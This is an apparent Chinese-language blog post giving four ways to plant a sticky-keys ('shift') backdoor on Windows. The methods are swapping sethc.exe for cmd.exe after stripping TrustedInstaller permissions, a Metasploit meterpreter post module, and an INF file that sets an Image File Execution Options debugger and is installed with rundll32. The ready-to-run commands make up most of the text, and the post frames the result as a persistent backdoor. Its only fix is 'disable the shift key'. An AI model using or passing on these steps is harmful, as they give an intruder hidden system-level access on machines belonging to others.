后门建立方法一
把 c:\windows\system32\sethc.exe 和 c:\windows\system32\dllcache\sethc.exe 两个文件全部改成 baksethc.exe
move c:\windows\system32\sethc.exe c:\windows\system32\sethc-bak.exe
copy c:\windows\system32\cmd.exe c:\windows\system32\sethc.exe
copy c:\windows\system32\cmd.exe c:\windows\system32\dllcache\sethc.exe
另外,如果修改或删除该文件时,默认失败,权限问题,可以属性安全里把其TrustedInstaller用户删除即可
后门建立方法二
使用msf,在meterpreter会话下执行以下命令
meterpreter > run post/windows/manage/sticky_keys
后门建立方法三
将下面的代码保存成inf文件
[Version]
Signature="$WINDOWS NT$"
[DefaultInstall]
AddReg=My_AddReg_Name
[My_AddReg_Name]
HKLM,SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution options\sethc.exe,debugger,0x00000000,c:\windows\system32\cmd.exe
然后上传到一个可以执行目录,然后执行以下命令
rundll32.exe setupapi,InstallHinfSection DefaultInstall 128 c:\windows\temp\i.inf
后门建立方法四
百度搜索下载shift后门生成器,太多了,不赘述
效果演示
以后每次按下5次shift键就会弹出cmd框,即可以做后门又可以做快捷键
成功弹出命令窗口
修复方法
禁用shift键
© 走过岁月...... | Powered by LOFTER